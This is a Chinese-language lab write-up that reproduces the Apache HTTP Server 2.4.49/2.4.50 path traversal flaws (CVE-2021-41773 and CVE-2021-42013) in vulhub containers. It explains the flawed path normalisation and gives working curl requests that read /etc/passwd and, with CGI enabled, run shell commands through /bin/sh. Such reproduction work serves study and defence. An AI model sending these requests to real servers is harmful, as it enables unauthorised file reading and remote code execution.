HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符。
当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在…/。 如果路径中存在%2e./形式,就会检测到,但是出现.%2e/这种形式时,就不会检测到,原因是在遍历到第一个.字符时,此时检测到后面的两个字符是%2而不是./,就不会把它当作路径穿越符处理,因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测
二、影响版本Apache HTTP2.4.49
三、漏洞复现cd vulhub/httpd/CVE-2021-41773
docker-compose up -d开启环境
docker ps得知开放的是8080端口
漏洞利用poc
curl -v --path-as-is http://192.168.236.128:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
该漏洞是由于在 Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行
二、影响版本- Apache HTTP Server 2.4.49
- Apache HTTP Server 2.4.50
cd vulhub/httpd/CVE-2021-42013
docker-compose up -d开启环境
docker ps得知开放的是8080端口
访问开启的环境,看到了 It works 证明环境开启成功
漏洞利用poc:
curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
存在目录遍历漏洞
在服务器上启用 mods cgi 或 cgid 后 此目录遍历漏洞将允许任意命令执行:
curl -v --data "echo;id" 'http://ip:port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' 或者 curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; whoami' "http://ip:port//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"
